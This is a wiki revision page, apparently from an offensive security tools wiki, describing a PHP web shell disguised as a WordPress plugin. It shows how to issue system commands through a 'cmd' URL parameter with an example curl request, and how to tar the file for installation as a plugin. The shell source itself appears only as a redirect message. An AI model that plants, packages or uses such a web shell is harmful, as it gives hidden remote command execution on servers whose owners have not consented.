Difference between revisions of "WordPress Plugin - shell.php (variant 1)"
m |
m |
||
| Line 7: | Line 7: | ||
Enough with intros so here's the code. | Enough with intros so here's the code. | ||
| − | {{#github:webshells/wp_shell1.php|blaksec/sectools|master|php}} | + | {{#github:webshells/wp_shell1.php|blaksec/sectools|master|php|line=1|start=1}} |
Now just tar it up and it's ready to go | Now just tar it up and it's ready to go | ||
Latest revision as of 22:42, 17 July 2018
The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
E.g.
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"Enough with intros so here's the code.
Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/blaksec/sectools@master/webshells/wp_shell1.phpNow just tar it up and it's ready to go
tar -zcvf ./shell.tgz shell.php